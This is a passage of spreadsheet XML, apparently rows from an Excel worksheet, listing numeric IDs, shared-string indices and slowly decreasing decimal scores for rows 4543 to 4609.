    <row r="4543" ht="15.75" customHeight="1">
      <c r="A4543" s="1">
        <v>13411.0</v>
      </c>
      <c r="B4543" s="2">
        <v>3.5008469E7</v>
      </c>
      <c r="C4543" s="2" t="s">
        <v>4329</v>
      </c>
      <c r="D4543" s="2">
        <v>1.0</v>
      </c>
      <c r="E4543" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4543" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="4544" ht="15.75" customHeight="1">
      <c r="A4544" s="1">
        <v>14937.0</v>
      </c>
      <c r="B4544" s="2">
        <v>4.1252987E7</v>
      </c>
      <c r="C4544" s="2" t="s">
        <v>4330</v>
      </c>
      <c r="D4544" s="2">
        <v>1.0</v>
      </c>
      <c r="E4544" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4544" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="4545" ht="15.75" customHeight="1">
      <c r="A4545" s="1">
        <v>29472.0</v>
      </c>
      <c r="B4545" s="2">
        <v>3.2364429E7</v>
      </c>
      <c r="C4545" s="2" t="s">
        <v>4331</v>
      </c>
      <c r="D4545" s="2">
        <v>1.0</v>
      </c>
      <c r="E4545" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4545" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="4546" ht="15.75" customHeight="1">
      <c r="A4546" s="1">
        <v>359.0</v>
      </c>
      <c r="B4546" s="2">
        <v>1.6123184E7</v>
      </c>
      <c r="C4546" s="2" t="s">
        <v>4332</v>
      </c>
      <c r="D4546" s="2">
        <v>1.0</v>
      </c>
      <c r="E4546" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4546" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="4547" ht="15.75" customHeight="1">
      <c r="A4547" s="1">
        <v>1250.0</v>
      </c>
      <c r="B4547" s="2">
        <v>2.5168713E7</v>
      </c>
      <c r="C4547" s="2" t="s">
        <v>4333</v>
      </c>
      <c r="D4547" s="2">
        <v>1.0</v>
      </c>
      <c r="E4547" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4547" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="4548" ht="15.75" customHeight="1">
      <c r="A4548" s="1">
        <v>2004.0</v>
      </c>
      <c r="B4548" s="2">
        <v>3.0636217E7</v>
      </c>
      <c r="C4548" s="2" t="s">
        <v>4334</v>
      </c>
      <c r="D4548" s="2">
        <v>1.0</v>
      </c>
      <c r="E4548" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4548" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="4549" ht="15.75" customHeight="1">
      <c r="A4549" s="1">
        <v>5009.0</v>
      </c>
      <c r="B4549" s="2">
        <v>4.4197021E7</v>
      </c>
      <c r="C4549" s="2" t="s">
        <v>4335</v>
      </c>
      <c r="D4549" s="2">
        <v>1.0</v>
      </c>
      <c r="E4549" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4549" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="4550" ht="15.75" customHeight="1">
      <c r="A4550" s="1">
        <v>5732.0</v>
      </c>
      <c r="B4550" s="2">
        <v>4.6611509E7</v>
      </c>
      <c r="C4550" s="2" t="s">
        <v>4336</v>
      </c>
      <c r="D4550" s="2">
        <v>1.0</v>
      </c>
      <c r="E4550" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4550" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="4551" ht="15.75" customHeight="1">
      <c r="A4551" s="1">
        <v>5862.0</v>
      </c>
      <c r="B4551" s="2">
        <v>4.6961775E7</v>
      </c>
      <c r="C4551" s="2" t="s">
        <v>4337</v>
      </c>
      <c r="D4551" s="2">
        <v>1.0</v>
      </c>
      <c r="E4551" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4551" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="4552" ht="15.75" customHeight="1">
      <c r="A4552" s="1">
        <v>6713.0</v>
      </c>
      <c r="B4552" s="2">
        <v>4.9250691E7</v>
      </c>
      <c r="C4552" s="2" t="s">
        <v>4338</v>
      </c>
      <c r="D4552" s="2">
        <v>1.0</v>
      </c>
      <c r="E4552" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4552" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="4553" ht="15.75" customHeight="1">
      <c r="A4553" s="1">
        <v>8307.0</v>
      </c>
      <c r="B4553" s="2">
        <v>5.360211E7</v>
      </c>
      <c r="C4553" s="2" t="s">
        <v>4339</v>
      </c>
      <c r="D4553" s="2">
        <v>1.0</v>
      </c>
      <c r="E4553" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4553" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="4554" ht="15.75" customHeight="1">
      <c r="A4554" s="1">
        <v>8985.0</v>
      </c>
      <c r="B4554" s="2">
        <v>5.4962246E7</v>
      </c>
      <c r="C4554" s="2" t="s">
        <v>4340</v>
      </c>
      <c r="D4554" s="2">
        <v>1.0</v>
      </c>
      <c r="E4554" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4554" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="4555" ht="15.75" customHeight="1">
      <c r="A4555" s="1">
        <v>9687.0</v>
      </c>
      <c r="B4555" s="2">
        <v>5.6345286E7</v>
      </c>
      <c r="C4555" s="2" t="s">
        <v>4341</v>
      </c>
      <c r="D4555" s="2">
        <v>1.0</v>
      </c>
      <c r="E4555" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4555" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="4556" ht="15.75" customHeight="1">
      <c r="A4556" s="1">
        <v>10059.0</v>
      </c>
      <c r="B4556" s="2">
        <v>5.7125017E7</v>
      </c>
      <c r="C4556" s="2" t="s">
        <v>4342</v>
      </c>
      <c r="D4556" s="2">
        <v>1.0</v>
      </c>
      <c r="E4556" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4556" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="4557" ht="15.75" customHeight="1">
      <c r="A4557" s="1">
        <v>10844.0</v>
      </c>
      <c r="B4557" s="2">
        <v>1.6126059E7</v>
      </c>
      <c r="C4557" s="2" t="s">
        <v>4343</v>
      </c>
      <c r="D4557" s="2">
        <v>1.0</v>
      </c>
      <c r="E4557" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4557" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="4558" ht="15.75" customHeight="1">
      <c r="A4558" s="1">
        <v>13782.0</v>
      </c>
      <c r="B4558" s="2">
        <v>3.6560484E7</v>
      </c>
      <c r="C4558" s="2" t="s">
        <v>4344</v>
      </c>
      <c r="D4558" s="2">
        <v>1.0</v>
      </c>
      <c r="E4558" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4558" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="4559" ht="15.75" customHeight="1">
      <c r="A4559" s="1">
        <v>14286.0</v>
      </c>
      <c r="B4559" s="2">
        <v>3.849227E7</v>
      </c>
      <c r="C4559" s="2" t="s">
        <v>4345</v>
      </c>
      <c r="D4559" s="2">
        <v>1.0</v>
      </c>
      <c r="E4559" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4559" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="4560" ht="15.75" customHeight="1">
      <c r="A4560" s="1">
        <v>17063.0</v>
      </c>
      <c r="B4560" s="2">
        <v>4.8566767E7</v>
      </c>
      <c r="C4560" s="2" t="s">
        <v>4346</v>
      </c>
      <c r="D4560" s="2">
        <v>1.0</v>
      </c>
      <c r="E4560" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4560" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="4561" ht="15.75" customHeight="1">
      <c r="A4561" s="1">
        <v>18023.0</v>
      </c>
      <c r="B4561" s="2">
        <v>5.1519213E7</v>
      </c>
      <c r="C4561" s="2" t="s">
        <v>4347</v>
      </c>
      <c r="D4561" s="2">
        <v>1.0</v>
      </c>
      <c r="E4561" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4561" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="4562" ht="15.75" customHeight="1">
      <c r="A4562" s="1">
        <v>18137.0</v>
      </c>
      <c r="B4562" s="2">
        <v>5.1825003E7</v>
      </c>
      <c r="C4562" s="2" t="s">
        <v>4348</v>
      </c>
      <c r="D4562" s="2">
        <v>1.0</v>
      </c>
      <c r="E4562" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4562" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="4563" ht="15.75" customHeight="1">
      <c r="A4563" s="1">
        <v>19460.0</v>
      </c>
      <c r="B4563" s="2">
        <v>5.5761965E7</v>
      </c>
      <c r="C4563" s="2" t="s">
        <v>4349</v>
      </c>
      <c r="D4563" s="2">
        <v>1.0</v>
      </c>
      <c r="E4563" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4563" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="4564" ht="15.75" customHeight="1">
      <c r="A4564" s="1">
        <v>19847.0</v>
      </c>
      <c r="B4564" s="2">
        <v>5.7093706E7</v>
      </c>
      <c r="C4564" s="2" t="s">
        <v>4350</v>
      </c>
      <c r="D4564" s="2">
        <v>1.0</v>
      </c>
      <c r="E4564" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4564" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="4565" ht="15.75" customHeight="1">
      <c r="A4565" s="1">
        <v>4213.0</v>
      </c>
      <c r="B4565" s="2">
        <v>4.1700974E7</v>
      </c>
      <c r="C4565" s="2" t="s">
        <v>4351</v>
      </c>
      <c r="D4565" s="2">
        <v>1.0</v>
      </c>
      <c r="E4565" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4565" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="4566" ht="15.75" customHeight="1">
      <c r="A4566" s="1">
        <v>6097.0</v>
      </c>
      <c r="B4566" s="2">
        <v>4.7702804E7</v>
      </c>
      <c r="C4566" s="2" t="s">
        <v>4352</v>
      </c>
      <c r="D4566" s="2">
        <v>1.0</v>
      </c>
      <c r="E4566" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4566" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="4567" ht="15.75" customHeight="1">
      <c r="A4567" s="1">
        <v>6412.0</v>
      </c>
      <c r="B4567" s="2">
        <v>4.8533076E7</v>
      </c>
      <c r="C4567" s="2" t="s">
        <v>4353</v>
      </c>
      <c r="D4567" s="2">
        <v>1.0</v>
      </c>
      <c r="E4567" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4567" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="4568" ht="15.75" customHeight="1">
      <c r="A4568" s="1">
        <v>6469.0</v>
      </c>
      <c r="B4568" s="2">
        <v>4.865123E7</v>
      </c>
      <c r="C4568" s="2" t="s">
        <v>4354</v>
      </c>
      <c r="D4568" s="2">
        <v>1.0</v>
      </c>
      <c r="E4568" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4568" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="4569" ht="15.75" customHeight="1">
      <c r="A4569" s="1">
        <v>8528.0</v>
      </c>
      <c r="B4569" s="2">
        <v>5.4096901E7</v>
      </c>
      <c r="C4569" s="2" t="s">
        <v>4355</v>
      </c>
      <c r="D4569" s="2">
        <v>1.0</v>
      </c>
      <c r="E4569" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4569" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="4570" ht="15.75" customHeight="1">
      <c r="A4570" s="1">
        <v>11095.0</v>
      </c>
      <c r="B4570" s="2">
        <v>1.8521602E7</v>
      </c>
      <c r="C4570" s="2" t="s">
        <v>4356</v>
      </c>
      <c r="D4570" s="2">
        <v>1.0</v>
      </c>
      <c r="E4570" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4570" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="4571" ht="15.75" customHeight="1">
      <c r="A4571" s="1">
        <v>12975.0</v>
      </c>
      <c r="B4571" s="2">
        <v>3.2623982E7</v>
      </c>
      <c r="C4571" s="2" t="s">
        <v>4357</v>
      </c>
      <c r="D4571" s="2">
        <v>1.0</v>
      </c>
      <c r="E4571" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4571" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="4572" ht="15.75" customHeight="1">
      <c r="A4572" s="1">
        <v>13563.0</v>
      </c>
      <c r="B4572" s="2">
        <v>3.5692204E7</v>
      </c>
      <c r="C4572" s="2" t="s">
        <v>4358</v>
      </c>
      <c r="D4572" s="2">
        <v>1.0</v>
      </c>
      <c r="E4572" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4572" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="4573" ht="15.75" customHeight="1">
      <c r="A4573" s="1">
        <v>14149.0</v>
      </c>
      <c r="B4573" s="2">
        <v>3.798018E7</v>
      </c>
      <c r="C4573" s="2" t="s">
        <v>4359</v>
      </c>
      <c r="D4573" s="2">
        <v>1.0</v>
      </c>
      <c r="E4573" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4573" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="4574" ht="15.75" customHeight="1">
      <c r="A4574" s="1">
        <v>15780.0</v>
      </c>
      <c r="B4574" s="2">
        <v>4.4188808E7</v>
      </c>
      <c r="C4574" s="2" t="s">
        <v>4360</v>
      </c>
      <c r="D4574" s="2">
        <v>1.0</v>
      </c>
      <c r="E4574" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4574" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="4575" ht="15.75" customHeight="1">
      <c r="A4575" s="1">
        <v>19461.0</v>
      </c>
      <c r="B4575" s="2">
        <v>5.5762012E7</v>
      </c>
      <c r="C4575" s="2" t="s">
        <v>4361</v>
      </c>
      <c r="D4575" s="2">
        <v>1.0</v>
      </c>
      <c r="E4575" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4575" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="4576" ht="15.75" customHeight="1">
      <c r="A4576" s="1">
        <v>28846.0</v>
      </c>
      <c r="B4576" s="2">
        <v>2.8958948E7</v>
      </c>
      <c r="C4576" s="2" t="s">
        <v>4362</v>
      </c>
      <c r="D4576" s="2">
        <v>1.0</v>
      </c>
      <c r="E4576" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4576" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="4577" ht="15.75" customHeight="1">
      <c r="A4577" s="1">
        <v>6986.0</v>
      </c>
      <c r="B4577" s="2">
        <v>5.0048187E7</v>
      </c>
      <c r="C4577" s="2" t="s">
        <v>4363</v>
      </c>
      <c r="D4577" s="2">
        <v>1.0</v>
      </c>
      <c r="E4577" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4577" s="2">
        <v>0.1031746031746032</v>
      </c>
    </row>
    <row r="4578" ht="15.75" customHeight="1">
      <c r="A4578" s="1">
        <v>27162.0</v>
      </c>
      <c r="B4578" s="2">
        <v>2.0814406E7</v>
      </c>
      <c r="C4578" s="2" t="s">
        <v>4364</v>
      </c>
      <c r="D4578" s="2">
        <v>1.0</v>
      </c>
      <c r="E4578" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4578" s="2">
        <v>0.1031746031746032</v>
      </c>
    </row>
    <row r="4579" ht="15.75" customHeight="1">
      <c r="A4579" s="1">
        <v>1030.0</v>
      </c>
      <c r="B4579" s="2">
        <v>2.3180755E7</v>
      </c>
      <c r="C4579" s="2" t="s">
        <v>4365</v>
      </c>
      <c r="D4579" s="2">
        <v>1.0</v>
      </c>
      <c r="E4579" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4579" s="2">
        <v>0.1029143897996357</v>
      </c>
    </row>
    <row r="4580" ht="15.75" customHeight="1">
      <c r="A4580" s="1">
        <v>955.0</v>
      </c>
      <c r="B4580" s="2">
        <v>2.2656269E7</v>
      </c>
      <c r="C4580" s="2" t="s">
        <v>4366</v>
      </c>
      <c r="D4580" s="2">
        <v>1.0</v>
      </c>
      <c r="E4580" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4580" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="4581" ht="15.75" customHeight="1">
      <c r="A4581" s="1">
        <v>10897.0</v>
      </c>
      <c r="B4581" s="2">
        <v>1.6579287E7</v>
      </c>
      <c r="C4581" s="2" t="s">
        <v>4367</v>
      </c>
      <c r="D4581" s="2">
        <v>1.0</v>
      </c>
      <c r="E4581" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4581" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="4582" ht="15.75" customHeight="1">
      <c r="A4582" s="1">
        <v>29047.0</v>
      </c>
      <c r="B4582" s="2">
        <v>3.0205177E7</v>
      </c>
      <c r="C4582" s="2" t="s">
        <v>4368</v>
      </c>
      <c r="D4582" s="2">
        <v>1.0</v>
      </c>
      <c r="E4582" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4582" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="4583" ht="15.75" customHeight="1">
      <c r="A4583" s="1">
        <v>31045.0</v>
      </c>
      <c r="B4583" s="2">
        <v>4.7926309E7</v>
      </c>
      <c r="C4583" s="2" t="s">
        <v>4369</v>
      </c>
      <c r="D4583" s="2">
        <v>1.0</v>
      </c>
      <c r="E4583" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4583" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="4584" ht="15.75" customHeight="1">
      <c r="A4584" s="1">
        <v>29602.0</v>
      </c>
      <c r="B4584" s="2">
        <v>3.3567932E7</v>
      </c>
      <c r="C4584" s="2" t="s">
        <v>4370</v>
      </c>
      <c r="D4584" s="2">
        <v>1.0</v>
      </c>
      <c r="E4584" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4584" s="2">
        <v>0.1026365348399247</v>
      </c>
    </row>
    <row r="4585" ht="15.75" customHeight="1">
      <c r="A4585" s="1">
        <v>17187.0</v>
      </c>
      <c r="B4585" s="2">
        <v>4.8914679E7</v>
      </c>
      <c r="C4585" s="2" t="s">
        <v>4371</v>
      </c>
      <c r="D4585" s="2">
        <v>1.0</v>
      </c>
      <c r="E4585" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4585" s="2">
        <v>0.1024904214559387</v>
      </c>
    </row>
    <row r="4586" ht="15.75" customHeight="1">
      <c r="A4586" s="1">
        <v>2620.0</v>
      </c>
      <c r="B4586" s="2">
        <v>3.4476046E7</v>
      </c>
      <c r="C4586" s="2" t="s">
        <v>4372</v>
      </c>
      <c r="D4586" s="2">
        <v>1.0</v>
      </c>
      <c r="E4586" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4586" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="4587" ht="15.75" customHeight="1">
      <c r="A4587" s="1">
        <v>4697.0</v>
      </c>
      <c r="B4587" s="2">
        <v>4.3243127E7</v>
      </c>
      <c r="C4587" s="2" t="s">
        <v>4373</v>
      </c>
      <c r="D4587" s="2">
        <v>1.0</v>
      </c>
      <c r="E4587" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4587" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="4588" ht="15.75" customHeight="1">
      <c r="A4588" s="1">
        <v>5763.0</v>
      </c>
      <c r="B4588" s="2">
        <v>4.6674355E7</v>
      </c>
      <c r="C4588" s="2" t="s">
        <v>4374</v>
      </c>
      <c r="D4588" s="2">
        <v>1.0</v>
      </c>
      <c r="E4588" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4588" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="4589" ht="15.75" customHeight="1">
      <c r="A4589" s="1">
        <v>11005.0</v>
      </c>
      <c r="B4589" s="2">
        <v>1.7676983E7</v>
      </c>
      <c r="C4589" s="2" t="s">
        <v>4375</v>
      </c>
      <c r="D4589" s="2">
        <v>1.0</v>
      </c>
      <c r="E4589" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4589" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="4590" ht="15.75" customHeight="1">
      <c r="A4590" s="1">
        <v>24481.0</v>
      </c>
      <c r="B4590" s="2">
        <v>1.1045432E7</v>
      </c>
      <c r="C4590" s="2" t="s">
        <v>4376</v>
      </c>
      <c r="D4590" s="2">
        <v>1.0</v>
      </c>
      <c r="E4590" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4590" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="4591" ht="15.75" customHeight="1">
      <c r="A4591" s="1">
        <v>1606.0</v>
      </c>
      <c r="B4591" s="2">
        <v>2.7815067E7</v>
      </c>
      <c r="C4591" s="2" t="s">
        <v>4377</v>
      </c>
      <c r="D4591" s="2">
        <v>1.0</v>
      </c>
      <c r="E4591" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4591" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="4592" ht="15.75" customHeight="1">
      <c r="A4592" s="1">
        <v>2225.0</v>
      </c>
      <c r="B4592" s="2">
        <v>3.2210879E7</v>
      </c>
      <c r="C4592" s="2" t="s">
        <v>4378</v>
      </c>
      <c r="D4592" s="2">
        <v>1.0</v>
      </c>
      <c r="E4592" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4592" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="4593" ht="15.75" customHeight="1">
      <c r="A4593" s="1">
        <v>4846.0</v>
      </c>
      <c r="B4593" s="2">
        <v>4.3701119E7</v>
      </c>
      <c r="C4593" s="2" t="s">
        <v>4379</v>
      </c>
      <c r="D4593" s="2">
        <v>1.0</v>
      </c>
      <c r="E4593" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4593" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="4594" ht="15.75" customHeight="1">
      <c r="A4594" s="1">
        <v>11512.0</v>
      </c>
      <c r="B4594" s="2">
        <v>2.2275666E7</v>
      </c>
      <c r="C4594" s="2" t="s">
        <v>4380</v>
      </c>
      <c r="D4594" s="2">
        <v>1.0</v>
      </c>
      <c r="E4594" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4594" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="4595" ht="15.75" customHeight="1">
      <c r="A4595" s="1">
        <v>15416.0</v>
      </c>
      <c r="B4595" s="2">
        <v>4.2881341E7</v>
      </c>
      <c r="C4595" s="2" t="s">
        <v>4381</v>
      </c>
      <c r="D4595" s="2">
        <v>1.0</v>
      </c>
      <c r="E4595" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4595" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="4596" ht="15.75" customHeight="1">
      <c r="A4596" s="1">
        <v>20595.0</v>
      </c>
      <c r="B4596" s="2">
        <v>1.3813939E7</v>
      </c>
      <c r="C4596" s="2" t="s">
        <v>4382</v>
      </c>
      <c r="D4596" s="2">
        <v>1.0</v>
      </c>
      <c r="E4596" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4596" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="4597" ht="15.75" customHeight="1">
      <c r="A4597" s="1">
        <v>4077.0</v>
      </c>
      <c r="B4597" s="2">
        <v>4.1179166E7</v>
      </c>
      <c r="C4597" s="2" t="s">
        <v>4383</v>
      </c>
      <c r="D4597" s="2">
        <v>1.0</v>
      </c>
      <c r="E4597" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4597" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="4598" ht="15.75" customHeight="1">
      <c r="A4598" s="1">
        <v>5735.0</v>
      </c>
      <c r="B4598" s="2">
        <v>4.6611509E7</v>
      </c>
      <c r="C4598" s="2" t="s">
        <v>4384</v>
      </c>
      <c r="D4598" s="2">
        <v>1.0</v>
      </c>
      <c r="E4598" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4598" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="4599" ht="15.75" customHeight="1">
      <c r="A4599" s="1">
        <v>7812.0</v>
      </c>
      <c r="B4599" s="2">
        <v>5.2256123E7</v>
      </c>
      <c r="C4599" s="2" t="s">
        <v>4385</v>
      </c>
      <c r="D4599" s="2">
        <v>1.0</v>
      </c>
      <c r="E4599" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4599" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="4600" ht="15.75" customHeight="1">
      <c r="A4600" s="1">
        <v>8863.0</v>
      </c>
      <c r="B4600" s="2">
        <v>5.4742613E7</v>
      </c>
      <c r="C4600" s="2" t="s">
        <v>4386</v>
      </c>
      <c r="D4600" s="2">
        <v>1.0</v>
      </c>
      <c r="E4600" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4600" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="4601" ht="15.75" customHeight="1">
      <c r="A4601" s="1">
        <v>9655.0</v>
      </c>
      <c r="B4601" s="2">
        <v>5.6285492E7</v>
      </c>
      <c r="C4601" s="2" t="s">
        <v>4387</v>
      </c>
      <c r="D4601" s="2">
        <v>1.0</v>
      </c>
      <c r="E4601" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4601" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="4602" ht="15.75" customHeight="1">
      <c r="A4602" s="1">
        <v>10526.0</v>
      </c>
      <c r="B4602" s="2">
        <v>1.2137855E7</v>
      </c>
      <c r="C4602" s="2" t="s">
        <v>4388</v>
      </c>
      <c r="D4602" s="2">
        <v>1.0</v>
      </c>
      <c r="E4602" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4602" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="4603" ht="15.75" customHeight="1">
      <c r="A4603" s="1">
        <v>10983.0</v>
      </c>
      <c r="B4603" s="2">
        <v>1.7382363E7</v>
      </c>
      <c r="C4603" s="2" t="s">
        <v>4389</v>
      </c>
      <c r="D4603" s="2">
        <v>1.0</v>
      </c>
      <c r="E4603" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4603" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="4604" ht="15.75" customHeight="1">
      <c r="A4604" s="1">
        <v>11521.0</v>
      </c>
      <c r="B4604" s="2">
        <v>2.2354849E7</v>
      </c>
      <c r="C4604" s="2" t="s">
        <v>4390</v>
      </c>
      <c r="D4604" s="2">
        <v>1.0</v>
      </c>
      <c r="E4604" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4604" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="4605" ht="15.75" customHeight="1">
      <c r="A4605" s="1">
        <v>11719.0</v>
      </c>
      <c r="B4605" s="2">
        <v>2.3786107E7</v>
      </c>
      <c r="C4605" s="2" t="s">
        <v>4391</v>
      </c>
      <c r="D4605" s="2">
        <v>1.0</v>
      </c>
      <c r="E4605" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4605" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="4606" ht="15.75" customHeight="1">
      <c r="A4606" s="1">
        <v>11943.0</v>
      </c>
      <c r="B4606" s="2">
        <v>2.5541274E7</v>
      </c>
      <c r="C4606" s="2" t="s">
        <v>4392</v>
      </c>
      <c r="D4606" s="2">
        <v>1.0</v>
      </c>
      <c r="E4606" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4606" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="4607" ht="15.75" customHeight="1">
      <c r="A4607" s="1">
        <v>12568.0</v>
      </c>
      <c r="B4607" s="2">
        <v>2.9971617E7</v>
      </c>
      <c r="C4607" s="2" t="s">
        <v>4393</v>
      </c>
      <c r="D4607" s="2">
        <v>1.0</v>
      </c>
      <c r="E4607" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4607" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="4608" ht="15.75" customHeight="1">
      <c r="A4608" s="1">
        <v>13747.0</v>
      </c>
      <c r="B4608" s="2">
        <v>3.6473811E7</v>
      </c>
      <c r="C4608" s="2" t="s">
        <v>4394</v>
      </c>
      <c r="D4608" s="2">
        <v>1.0</v>
      </c>
      <c r="E4608" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4608" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="4609" ht="15.75" customHeight="1">
      <c r="A4609" s="1">
        <v>19392.0</v>
      </c>
      <c r="B4609" s="2">
        <v>5.5559509E7</v>
      </c>
      <c r="C4609" s="2" t="s">
        <v>4395</v>
      </c>
      <c r="D4609" s="2">
        <v>1.0</v>
      </c>
      <c r="E4609" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4609" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
